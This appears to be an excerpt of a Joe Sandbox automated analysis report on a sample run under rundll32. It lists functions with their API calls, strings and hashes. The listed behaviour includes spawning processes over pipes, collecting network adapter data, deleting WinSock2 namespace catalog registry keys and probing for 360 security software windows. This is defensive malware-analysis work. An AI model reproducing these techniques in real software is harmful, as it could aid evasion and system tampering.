Opcode Fuzzy Hash: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
Instruction Fuzzy Hash: 9C126F72218AC891FAB2EB55E8453DAB365FB897C4F448111FA8E43A99DF3DC749C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC851030 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 00000187EC8510FF
SetHandleInformation.KERNEL32 ref: 00000187EC851119
CreatePipe.KERNEL32 ref: 00000187EC85113A
SetHandleInformation.KERNEL32 ref: 00000187EC851154
CreatePipe.KERNEL32 ref: 00000187EC851175
SetHandleInformation.KERNEL32 ref: 00000187EC85118F
CreateProcessW.KERNEL32 ref: 00000187EC851251

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

PeekNamedPipe.KERNEL32 ref: 00000187EC851300
ReadFile.KERNEL32 ref: 00000187EC85135C
PeekNamedPipe.KERNEL32 ref: 00000187EC8513B0
ReadFile.KERNEL32 ref: 00000187EC85140C
GetExitCodeProcess.KERNEL32 ref: 00000187EC851445
TerminateProcess.KERNEL32 ref: 00000187EC851476
CloseHandle.KERNEL32 ref: 00000187EC851484

Part of subcall function 00000187EC85CB54: NtDelayExecution.NTDLL ref: 00000187EC85CB76

CloseHandle.KERNEL32 ref: 00000187EC851492
CloseHandle.KERNEL32 ref: 00000187EC8514A0
CloseHandle.KERNEL32 ref: 00000187EC8514AE

Part of subcall function 00000187EC857B40: NtFreeVirtualMemory.NTDLL ref: 00000187EC857B71

Strings

h, xrefs: 00000187EC851195

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
String ID: h
API String ID: 30365702-2439710439
Opcode ID: eb7bea1748a89db5f07d023bcdb676065683870e413be2d4ad1df109deaa66ff
Instruction ID: 16b6ac618e1702f54597c34aa9cc14f8e8fc63bea9adf32f3df8ce795cea22f4
Opcode Fuzzy Hash: eb7bea1748a89db5f07d023bcdb676065683870e413be2d4ad1df109deaa66ff
Instruction Fuzzy Hash: 66C1C37A21CBC08AE760DB65E59479BB7A1F3C4744F508115EAC983AA8DFBCC548CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060578 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 289registrywindowtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000000018006062B
FindWindowW.USER32 ref: 000000018006067B
IsWindow.USER32 ref: 0000000180060690
memset.MSVCRT ref: 00000001800606C2
SendMessageTimeoutW.USER32 ref: 0000000180060722
SendMessageTimeoutW.USER32 ref: 0000000180060767
RegOpenKeyExW.ADVAPI32 ref: 00000001800607BF
memset.MSVCRT ref: 00000001800607DE
RegQueryValueExW.ADVAPI32 ref: 0000000180060825
memset.MSVCRT ref: 00000001800608E0
RegQueryValueExW.ADVAPI32 ref: 0000000180060918

Part of subcall function 0000000180016DD4: memmove.MSVCRT(?,?,?,?,?,?,?,0000000180016E29), ref: 0000000180016E10

RegCloseKey.ADVAPI32 ref: 00000001800609B9

Strings

activeapp, xrefs: 0000000180060819
Q360SafeMonClass, xrefs: 0000000180060674
activeweb, xrefs: 000000018006090C
MsgCenter, xrefs: 000000018006078E
TS2P, xrefs: 0000000180060713

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Windowmemset$MessageQuerySendTimeoutValue$CloseFindForegroundOpenmemmove
String ID: MsgCenter$Q360SafeMonClass$TS2P$activeapp$activeweb
API String ID: 3772276521-2728888700
Opcode ID: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
Instruction ID: ee8cae4e48a5beadbc07239537d79e19b069e47090ef93ff609d4821bf219365
Opcode Fuzzy Hash: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
Instruction Fuzzy Hash: C1D19172604B4886EB51DF25E8403DE7761F789BE8F608215EAAD43BE5DF38C649CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007E7C7 Relevance: 28.7, APIs: 16, Strings: 3, Instructions: 248COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 000000018007EB4B
free.MSVCRT ref: 000000018007EB57
free.MSVCRT ref: 000000018007EB62
memset.MSVCRT ref: 000000018007EBC2
calloc.MSVCRT ref: 000000018007EC04
free.MSVCRT ref: 000000018007EC10
free.MSVCRT ref: 000000018007EC1B
calloc.MSVCRT ref: 000000018007ECB8
free.MSVCRT ref: 000000018007ECC4
free.MSVCRT ref: 000000018007ECCF
calloc.MSVCRT ref: 000000018007ED0B
free.MSVCRT ref: 000000018007ED17
free.MSVCRT ref: 000000018007ED22
calloc.MSVCRT ref: 000000018007EDC9
free.MSVCRT ref: 000000018007EDD5
free.MSVCRT ref: 000000018007EDE0

Strings

-, xrefs: 000000018007EC59
], xrefs: 000000018007ED55
], xrefs: 000000018007EC39

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: free$calloc$memset
String ID: -$]$]
API String ID: 2591755499-1349866957
Opcode ID: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
Instruction ID: 1d85a50f400dc416e5d0a718f77556582d5ce19bdf984b68484f18af02043cc0
Opcode Fuzzy Hash: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
Instruction Fuzzy Hash: BCA1D272706BC892EB96CB16D0403A977A1F74D780F449616EB8A17B81DF39D2B9D300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005D014 Relevance: 28.4, APIs: 8, Strings: 8, Instructions: 422timesynchronizationCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 000000018005D0CB
SystemTimeToFileTime.KERNEL32 ref: 000000018005D0D9
??3@YAXPEAX@Z.MSVCRT ref: 000000018005D46D
free.MSVCRT ref: 000000018005D489
??3@YAXPEAX@Z.MSVCRT ref: 000000018005D597
free.MSVCRT ref: 000000018005D5B3
free.MSVCRT ref: 000000018005D5CB
ReleaseMutex.KERNEL32 ref: 000000018005D600

Strings

DELETE FROM 'MT' , xrefs: 000000018005D909
TimeStamp < %I64d;, xrefs: 000000018005D846
WHERE , xrefs: 000000018005D944
ModName LIKE ', xrefs: 000000018005D6E2
TYPE = %d, xrefs: 000000018005D76E
SLEV = %d , xrefs: 000000018005D7BB
INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) , xrefs: 000000018005D09E
AND , xrefs: 000000018005D73B

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Timefree$??3@System$FileMutexRelease
String ID: AND $ SLEV = %d $ TYPE = %d$ WHERE $DELETE FROM 'MT' $INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) $ModName LIKE '$TimeStamp < %I64d;
API String ID: 2360919559-3261407791
Opcode ID: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
Instruction ID: fbbc87ecfbf22c2b8803d4662eccf4799cfebf60f86054df91e993a66dbd8da4
Opcode Fuzzy Hash: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
Instruction Fuzzy Hash: B102B332711A4C85FFB29BA5D4403DD2361AB887D8F148627BE2E6B7D4DE3AC649C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052FD8 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 303registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000018005303F
LeaveCriticalSection.KERNEL32 ref: 0000000180053088
RegOpenKeyExW.ADVAPI32 ref: 0000000180053228
RegDeleteKeyW.ADVAPI32 ref: 0000000180053296
RegCloseKey.ADVAPI32 ref: 00000001800532E1

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

Strings

SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s, xrefs: 00000001800531D2
Num_Catalog_Entries, xrefs: 00000001800530A9
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d, xrefs: 0000000180053359
NameSpace_Catalog5, xrefs: 00000001800533D8
Catalog_Entries64, xrefs: 00000001800530B6
Num_Catalog_Entries64, xrefs: 00000001800530A2
%s\%s, xrefs: 0000000180053267
Catalog_Entries, xrefs: 00000001800530BD

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$CloseDeleteEnterLeaveOpenmemset
String ID: %s\%s$Catalog_Entries$Catalog_Entries64$NameSpace_Catalog5$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d
API String ID: 2413450229-732542554
Opcode ID: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
Instruction ID: 3ab1713314ff84c9548747a70e29f101a91a5434d94fe8d6158548384223fcd6
Opcode Fuzzy Hash: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
Instruction Fuzzy Hash: 69C1DEB1701A4D82EEA6DB29E8457D963A0F788BD4F04C422FE0D1B7A5DF39C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000834C Relevance: 19.8, APIs: 13, Instructions: 336stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81

lstrcmpiW.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00000001800083C8
lstrcmpiW.KERNEL32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800083E6
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008457
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008541
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 000000018000855D
RegSetValueExW.ADVAPI32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800085C2

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CharNext$lstrcmpi$Value
String ID:
API String ID: 3520330261-0
Opcode ID: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
Instruction ID: 54a0f5542f62afcd6411b2081a4c08be2fbbe8d603b0a409542dd15f8ed12d0a
Opcode Fuzzy Hash: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
Instruction Fuzzy Hash: D3D1643260864982FBA2DB15E8543DA76E1FB9C7D0F91C121BA99476E4EF38C74DD700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060174 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 270COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800601FC
SHGetValueW.SHLWAPI ref: 0000000180060257
_wtoi.MSVCRT ref: 000000018006029F
_wtoi.MSVCRT ref: 00000001800602B1
_wtoi.MSVCRT ref: 00000001800602C3
_wtoi.MSVCRT ref: 00000001800602D5
SHSetValueW.SHLWAPI ref: 0000000180060468
??3@YAXPEAX@Z.MSVCRT ref: 000000018006050C

Strings

%d|%d|%d|%d, xrefs: 0000000180060404
MsgCenter, xrefs: 000000018006021A, 000000018006042C, 0000000180060436
MontiorInfo, xrefs: 0000000180060244, 0000000180060455

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _wtoi$Value$??3@memset
String ID: %d|%d|%d|%d$MontiorInfo$MsgCenter
API String ID: 1219333133-3184008533
Opcode ID: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
Instruction ID: 3a97e8b4d36ab7b0ff62b7c8c746816c118d75ce1dcaba847e92933311b9e76e
Opcode Fuzzy Hash: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
Instruction Fuzzy Hash: FDC1B472604B4887EB51CF29E84039E77A1F789BA4F208216FAAD577A4DF78D644CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040CB0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 0000000180040CEF
memset.MSVCRT ref: 0000000180040D0A
SHGetValueW.SHLWAPI ref: 0000000180040D49
atoi.MSVCRT ref: 0000000180040D70
GetVersion.KERNEL32 ref: 0000000180040D80
GetModuleHandleW.KERNEL32 ref: 0000000180040DD0
GetProcAddress.KERNEL32 ref: 0000000180040DE0

Strings

ntdll.dll, xrefs: 0000000180040DC9
CurrentVersion, xrefs: 0000000180040D34
RtlGetVersion, xrefs: 0000000180040DD9
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0000000180040D3B

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Version$AddressHandleModuleProcValueatoimemset
String ID: CurrentVersion$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 1009632096-1820686997
Opcode ID: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
Instruction ID: 603b8f84a57364ab934b969a098bbde4f8155cf87e7eb2653b8acdc6aa15b94a
Opcode Fuzzy Hash: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
Instruction Fuzzy Hash: 0F416D31615A498AF792CF20EC883DB77A0F78C7A5F918115F56A426A8DF3CD24CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC857FA8 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

GetAdaptersInfo.IPHLPAPI ref: 00000187EC857FF4
GetAdaptersInfo.IPHLPAPI ref: 00000187EC85802B
wsprintfA.USER32 ref: 00000187EC858074
wsprintfA.USER32 ref: 00000187EC85815F
wsprintfA.USER32 ref: 00000187EC8581C3

Strings

o, xrefs: 00000187EC858006

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2074107575-252678980
Opcode ID: 78c1bf18890002bbd55230ae8bdd6788f42dae7e011ee9be3a01caf660352b1c
Instruction ID: 4b377bd6b0b6b130474dbb52b7fb1cd628d409e43a62450851c93a9e1425e525
Opcode Fuzzy Hash: 78c1bf18890002bbd55230ae8bdd6788f42dae7e011ee9be3a01caf660352b1c
Instruction Fuzzy Hash: C3B1BC3A21DB8086DB64CB15F59039AB7A1F7C8784F604166EB8E83B99DF7CC654CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800647B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064800

Part of subcall function 0000000180035E24: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000180035ED4
Part of subcall function 0000000180035E24: memmove.MSVCRT ref: 0000000180035F42
Part of subcall function 0000000180035E24: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180035F7C

??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800648B2
SysFreeString.OLEAUT32 ref: 0000000180064941
SysAllocString.OLEAUT32 ref: 000000018006495E
GetFileAttributesW.KERNEL32 ref: 0000000180064BC3
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180064D1C
??3@YAXPEAX@Z.MSVCRT ref: 0000000180064D8E
LeaveCriticalSection.KERNEL32 ref: 0000000180064DAC

Strings

360util, xrefs: 00000001800649C6, 0000000180064C35

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@CriticalSectionString$??2@AllocAttributesEnterFileFreeLeavememmove
String ID: 360util
API String ID: 2488163691-2294763832
Opcode ID: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
Instruction ID: 9938724ed40c23cc8900e9648d175c046ed33f6fe674e618e7d9782a5817fc1c
Opcode Fuzzy Hash: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
Instruction Fuzzy Hash: AE029C73B01B488AEB91CB64D8443DD33A6FB48798F519226EE592BB94DF38C619C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070760 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000000018007078B
memset.MSVCRT ref: 00000001800707E0
RtlCaptureContext.KERNEL32 ref: 00000001800707FC
RtlLookupFunctionEntry.KERNEL32 ref: 0000000180070814
RtlVirtualUnwind.KERNEL32 ref: 0000000180070852
IsDebuggerPresent.KERNEL32 ref: 0000000180070893
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018007089D
UnhandledExceptionFilter.KERNEL32 ref: 00000001800708A8
GetCurrentProcess.KERNEL32 ref: 00000001800708BE
TerminateProcess.KERNEL32 ref: 00000001800708CC

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentProcessUnhandled$CaptureContextCurrentDebuggerEntryFeatureFunctionLookupProcessorTerminateUnwindVirtualmemset
String ID:
API String ID: 2775880128-0
Opcode ID: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
Instruction ID: 97518c6b28749f0b1885d3d6b1dd33bd68934808d59c248e1302251445d11ba7
Opcode Fuzzy Hash: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
Instruction Fuzzy Hash: 1E413032A14B858AE751CF60EC503ED7360F799788F119229EA9D46B69EF78C398C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017FE8 Relevance: 13.8, APIs: 9, Instructions: 322COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000180018020
memmove.MSVCRT ref: 0000000180018188
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800181E8
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001820A
??3@YAXPEAX@Z.MSVCRT ref: 000000018001824D

Part of subcall function 0000000180044250: EnterCriticalSection.KERNEL32 ref: 0000000180044280
Part of subcall function 0000000180044250: LeaveCriticalSection.KERNEL32 ref: 00000001800442BA

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018278
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800182AD
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800182D5
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001845E

Part of subcall function 00000001800429F4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042AAA

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$??3@CountEnterLeaveTickmemmove
String ID:
API String ID: 1944083165-0
Opcode ID: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
Instruction ID: f41da155b52ef09f3583e4d9bfd8bf17b476c2db053c24b9ffbabfba65fc2eed
Opcode Fuzzy Hash: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
Instruction Fuzzy Hash: 37E15932B01F449AEB92CFA1E8403DD33B6F748798F148125EE5967B98DE34C65AD344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A994 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006A9D6

Part of subcall function 000000018006BD58: GetFileSizeEx.KERNEL32(?,?,?,?,000000018006A9EB,?,?,?,?,?,?,?,?,?,?,00000003), ref: 000000018006BD5C
Part of subcall function 000000018006BD58: _swprintf_c_l.LIBCMT ref: 000000018006BD74

Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B

_swprintf_c_l.LIBCMT ref: 000000018006AA1B
_swprintf_c_l.LIBCMT ref: 000000018006AA86
_swprintf_c_l.LIBCMT ref: 000000018006AB3B
_swprintf_c_l.LIBCMT ref: 000000018006AD15

Strings

INIT, xrefs: 000000018006AD63

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _swprintf_c_l$ErrorFileLastSizemallocmemset
String ID: INIT
API String ID: 2772675779-4041279936
Opcode ID: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
Instruction ID: 738f7e56dffb12879fa424a41098a8b7db62e01a67729e30f645ff56db629163
Opcode Fuzzy Hash: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
Instruction Fuzzy Hash: 31E192727043588BF7A6EB6598507EA77A6F70D7C8F54C029AE5A43B86DF34C608CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010B58 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146registryCOMMON

Download Yara Rule

APIs

